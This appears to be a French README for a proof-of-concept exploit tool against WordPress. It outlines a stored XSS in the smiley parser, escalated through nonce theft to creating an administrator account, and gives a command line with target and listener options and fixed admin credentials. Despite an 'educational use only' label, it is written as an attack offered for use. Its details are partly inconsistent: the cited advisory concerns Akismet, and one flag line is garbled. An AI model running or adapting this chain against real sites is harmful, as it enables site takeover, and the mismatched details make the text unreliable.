
Preuve de concept pour CVE-2015-9357 : XSS stocké dans l'analyseur d'émoticônes de WordPress qui contourne wp_kses, enchaîne la falsification de nonce pour créer des comptes administrateur. Usage éducatif uniquement.
XSS stocké dans l'analyseur de smileys/emoticônes de WordPress, création d'utilisateur administrateur via une requête nonce falsifiée.
S'échappe du contexte d'attribut <a href> via l'expression régulière des emoticônes, injecte du JS dans un gestionnaire onerror. Aucune balise script nécessaire, contourne le filtrage wp_kses sur le champ affecté.
Chaîne : soumettre une charge utile à tout champ qui subit la conversion smileys, l'admin la voit, le XSS s'exécute dans sa session, récupère le nonce de création d'utilisateur depuis user-new.php, publie un nouveau compte administrateur, confirme via connexion.
Usage uniquement en laboratoire/éducatif. Nécessite que le champ cible applique effectivement la conversion de smileys WordPress, varie selon le thème/plugin.
Divulgation originale de la vulnérabilité : https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
python3 CVE-2015-9357.py -t https://target -l LHOST -p LPORT \
--endpoint https://target/wp-admin/admin-ajax.php \
--field message --action <ajax_action> --nonce <nonce> \
--data "name=a,[email protected],phone=a"
--endpoint / dépendent de l'endroit où l'entrée vulnérable se situe réellement (commentaires, formulaire de contact, etc.), trouvez-le manuellement d'abord.
--fieldSortie en cas de succès : identifiants admin (pwned / Password123!) et URL wp-admin.